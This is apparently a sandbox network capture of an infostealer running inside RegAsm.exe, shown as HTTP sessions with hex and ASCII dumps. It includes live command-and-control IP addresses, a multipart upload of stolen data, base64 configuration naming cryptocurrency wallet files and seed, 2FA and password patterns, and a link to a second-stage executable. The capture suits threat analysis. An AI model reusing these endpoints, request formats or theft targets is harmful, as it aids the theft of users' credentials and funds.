                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 1025
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:33 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------EBKKKEGIDBGHIDGDHDBFCont
                                                                                                                                                      2024-10-03 07:16:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:34 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      18192.168.2.64973949.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:35 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:35 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------BAKEBAFIIECBGCAAAAFCCont
                                                                                                                                                      2024-10-03 07:16:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:35 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:36 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      19192.168.2.64974049.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:36 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------KJDGDGDHDGDBFIDHDBAFCont
                                                                                                                                                      2024-10-03 07:16:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:37 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:37 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                      Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      20192.168.2.64974249.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:38 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 461
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:38 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DHDHCGHDHIDHCBGCBGCACont
                                                                                                                                                      2024-10-03 07:16:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:38 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      21192.168.2.64974349.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:40 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 98121
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------JEGHCBAFBFHIIECBKFCGCont
                                                                                                                                                      2024-10-03 07:16:40 UTC16355OUTData Raw: 41 44 70 51 4f 4f 39 4c 6a 4e 4a 69 67 59 55 6d 63 39 71 58 76 2f 41 44 6f 46 41 41 66 53 6b 2f 4b 6a 36 30 64 4b 42 69 59 2f 4c 32 6f 50 48 30 70 53 50 2f 31 30 68 47 44 32 6f 41 54 32 2f 6c 53 30 64 71 43 44 69 6b 46 7a 76 61 4b 4b 4b 67 2b 57 49 70 35 70 72 53 78 76 4c 32 48 55 62 66 54 70 30 43 32 39 72 50 63 4c 4b 79 2b 61 35 79 32 50 4c 52 6a 77 69 73 4f 6e 38 51 71 47 35 57 56 58 31 67 61 64 70 70 31 6f 4f 31 76 50 62 51 78 4e 49 69 69 33 6d 33 46 35 41 42 74 62 43 4d 4e 6d 54 67 4c 31 59 56 4a 50 70 30 55 73 59 76 35 6f 4e 30 53 79 69 48 7a 44 6a 41 66 47 63 65 76 53 71 6a 36 46 70 38 6a 46 6a 41 41 54 31 49 72 79 61 32 45 71 31 61 73 71 6c 4f 66 6c 38 75 78 37 32 47 78 39 47 68 52 6a 53 71 30 72 72 66 31 66 63 31 57 33 74 34 6a 31 55 78 61 62 4a
                                                                                                                                                      Data Ascii: ADpQOO9LjNJigYUmc9qXv/ADoFAAfSk/Kj60dKBiY/L2oPH0pSP/10hGD2oAT2/lS0dqCDikFzvaKKKg+WIp5prSxvL2HUbfTp0C29rPcLKy+a5y2PLRjwisOn8QqG5WVX1gadpp1oO1vPbQxNIii3m3F5ABtbCMNmTgL1YVJPp0UsYv5oN0SyiHzDjAfGcevSqj6Fp8jFjAAT1Irya2Eq1asqlOfl8ux72Gx9GhRjSq0rrf1fc1W3t4j1UxabJ
                                                                                                                                                      2024-10-03 07:16:40 UTC16355OUTData Raw: 30 72 6f 4b 6c 35 4f 71 2f 64 57 52 67 50 70 6d 73 44 78 49 41 62 43 49 39 78 4b 42 2b 68 72 58 4c 45 6b 6b 6e 4a 50 57 75 66 38 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 68 6a 36 6a 69 47 63 61 57 57 56 4f 62 71 6b 76 6e 64 47 46 53 63 30 74 46 66 74 5a 2b 52 68 52 52 52 51 42 33 75 73 6f 4c 32 66 77 5a 70 73 33 4e 74 4d 66 4e 6b 54 73 78 53 4e 53 41 66 62 6b 2f 6e 55 6e 6a 58 57 64 52 74 39 54 30 7a 53 4e 50 75 30 73 66 74 5a 4a 65 35 66 48 41 7a 67 44 50 62 2f 41 50 56 55 32 73 36 58 64 33 6e 68 76 52 37 2f 41 45 34 62 74 51 30 35 49 70 34 6b 2f 76 6a 61 4e 79 2f 6a 67 66 6c 69 6c 2b 30 2b 47 2f 48 57 6e 78 70 64 6c 46 6e 6a 35 4d 4c 76 73 6c 68 62 75 50 63 66 70 58 79 74 47 55 56 47 45 32 72 71
                                                                                                                                                      Data Ascii: 0roKl5Oq/dWRgPpmsDxIAbCI9xKB+hrXLEkknJPWuf8RzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/hj6jiGcaWWVObqkvndGFSc0tFftZ+RhRRRQB3usoL2fwZps3NtMfNkTsxSNSAfbk/nUnjXWdRt9T0zSNPu0sftZJe5fHAzgDPb/APVU2s6Xd3nhvR7/AE4btQ05Ip4k/vjaNy/jgflil+0+G/HWnxpdlFnj5MLvslhbuPcfpXytGUVGE2rq
                                                                                                                                                      2024-10-03 07:16:40 UTC16355OUTData Raw: 62 68 53 66 51 5a 70 65 31 56 62 69 2b 74 6f 53 38 55 6b 75 48 41 36 62 53 61 79 72 31 59 30 36 62 6c 4a 32 4e 61 45 4f 65 6f 6c 61 2b 70 36 46 2f 77 41 4b 34 66 38 41 36 43 36 2f 2b 41 76 2f 41 4e 6e 52 2f 77 41 4b 34 66 38 41 36 43 36 2f 2b 41 76 2f 41 4e 6e 57 6e 2f 77 73 62 77 6e 2f 41 4e 42 58 2f 77 41 6c 35 66 38 41 34 6d 6c 58 34 69 2b 46 47 59 4b 4e 57 47 53 63 63 77 53 67 66 2b 67 31 38 70 2f 61 47 49 2f 6e 50 75 76 71 57 57 2f 79 78 2b 38 35 2f 55 76 41 6b 31 68 5a 47 65 4c 55 46 6e 6b 33 78 78 72 48 35 47 7a 63 57 63 4b 4f 64 78 78 39 36 75 55 6b 6a 65 47 56 34 70 55 5a 4a 45 4f 31 6b 59 59 49 4e 65 79 36 74 44 4c 4e 59 67 51 78 6d 52 30 6d 68 6c 32 41 67 46 67 6b 69 73 51 4d 6b 44 4f 41 65 70 72 6d 66 45 32 6a 54 61 32 6f 75 4c 66 52 72 79 47
                                                                                                                                                      Data Ascii: bhSfQZpe1Vbi+toS8UkuHA6bSayr1Y06blJ2NaEOeola+p6F/wAK4f8A6C6/+Av/ANnR/wAK4f8A6C6/+Av/ANnWn/wsbwn/ANBX/wAl5f8A4mlX4i+FGYKNWGSccwSgf+g18p/aGI/nPuvqWW/yx+85/UvAk1hZGeLUFnk3xxrH5GzcWcKOdxx96uUkjeGV4pUZJEO1kYYINey6tDLNYgQxmR0mhl2AgFgkisQMkDOAeprmfE2jTa2ouLfRryG
                                                                                                                                                      2024-10-03 07:16:40 UTC16355OUTData Raw: 7a 54 53 65 61 4c 6c 4b 42 4b 5a 53 52 78 67 43 6f 79 78 50 63 2f 6a 54 53 66 65 6d 6b 30 75 59 74 52 48 62 6a 6b 30 68 4f 61 51 6e 4e 4a 6e 6d 6c 64 6c 32 51 68 37 30 6d 65 31 4c 53 55 72 6c 42 2f 53 6b 41 2b 6c 48 53 6a 50 38 41 4f 69 34 78 4b 43 63 39 38 30 63 5a 7a 53 48 6d 67 59 6d 61 54 4f 4f 6c 4c 30 37 30 6e 35 55 44 44 50 50 46 49 63 39 4f 61 41 66 66 72 51 66 78 6f 47 49 61 51 6e 4e 4c 53 55 68 69 64 36 4f 6c 42 36 38 30 44 2f 36 31 41 78 4f 6a 47 67 30 48 38 36 50 35 65 39 41 43 45 6b 47 6b 36 43 6c 36 2f 68 52 69 69 34 78 4f 6c 46 46 48 49 48 72 53 47 65 69 30 55 55 56 42 38 67 46 46 62 58 68 6e 54 72 66 55 39 52 6c 67 75 55 4c 49 49 53 77 77 53 4d 48 63 6f 37 66 55 31 76 79 65 47 39 50 68 66 44 32 76 48 59 69 52 73 48 39 61 38 58 48 35 37 68
                                                                                                                                                      Data Ascii: zTSeaLlKBKZSRxgCoyxPc/jTSfemk0uYtRHbjk0hOaQnNJnmldl2Qh70me1LSUrlB/SkA+lHSjP8AOi4xKCc980cZzSHmgYmaTOOlL070n5UDDPPFIc9OaAffrQfxoGIaQnNLSUhid6OlB680D/61AxOjGg0H86P5e9ACEkGk6Cl6/hRii4xOlFFHIHrSGei0UUVB8gFFbXhnTrfU9RlguULIISwwSMHco7fU1vyeG9PhfD2vHYiRsH9a8XH57h
                                                                                                                                                      2024-10-03 07:16:40 UTC16346OUTData Raw: 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 70 67 46 46 47 66 61 6b 7a 53 47 4c 2b 4e 4a 53 55 55 77 46 7a 53 45 30 55 55 68 69 55 55 55 55 41 46 46 46 49 61 41 43 69 69 69 67 59 55 6c 46 46 41 42 52 52 53 64 36 42 68 52 52 52 51 41 48 70 53 55 70 70 4b 42 68 53 55 74 49 61 41 43 69 69 67 30 44 45 6f 6f 6f 6f 47 46 4a 52 52 54 41 4b 53 6c 4e 4a 51 4d 4b 53 67 30 55 41 46 4a 53 30 6c 41 42 53 47 6c 70 44 51 4d 4b 53 6c 70 4b 42 68 53 47 6c 70 4b 42 68 51 61 4b 53 6d 41 55 6c 4c 53 55 44 41 39 4b 53 6c 70 4b 42 68 53 55 74 4a 51 41 55 6c 4b 61 53 67 59 6c 46 46 46 41 78 4b 4b 4b 4b 42 69 55 55 55 6c 41 42 53 55 47 69 67 59 55 6c 46 46 41 77 70 4b 4b 44 54 47 4a 53 47 6c 70 4b 42 68 53 55 74 4a 51 4d 4b 53 6c 4e 4a 51 41 6c 46 46 4a 51 4d 4b 53 6c 70
                                                                                                                                                      Data Ascii: ooAKKKKACiiigAooopgFFGfakzSGL+NJSUUwFzSE0UUhiUUUUAFFFIaACiiigYUlFFABRRSd6BhRRRQAHpSUppKBhSUtIaACiig0DEooooGFJRRTAKSlNJQMKSg0UAFJS0lABSGlpDQMKSlpKBhSGlpKBhQaKSmAUlLSUDA9KSlpKBhSUtJQAUlKaSgYlFFFAxKKKKBiUUUlABSUGigYUlFFAwpKKDTGJSGlpKBhSUtJQMKSlNJQAlFFJQMKSlp
                                                                                                                                                      2024-10-03 07:16:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:41 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      22192.168.2.64974449.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:42 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------IIDHJKFBGIIJJKFIJDBGCont
                                                                                                                                                      2024-10-03 07:16:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:42 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:42 UTC99INData Raw: 35 38 0d 0a 4d 54 49 32 4e 7a 49 30 4d 33 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 55 78 4d 32 51 79 4e 54 46 69 59 6d 5a 66 62 48 4e 76 5a 43 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 58MTI2NzI0M3xodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmUxM2QyNTFiYmZfbHNvZC5leGV8MXxra2trfA==0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      23192.168.2.64974649.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:44 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 499
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
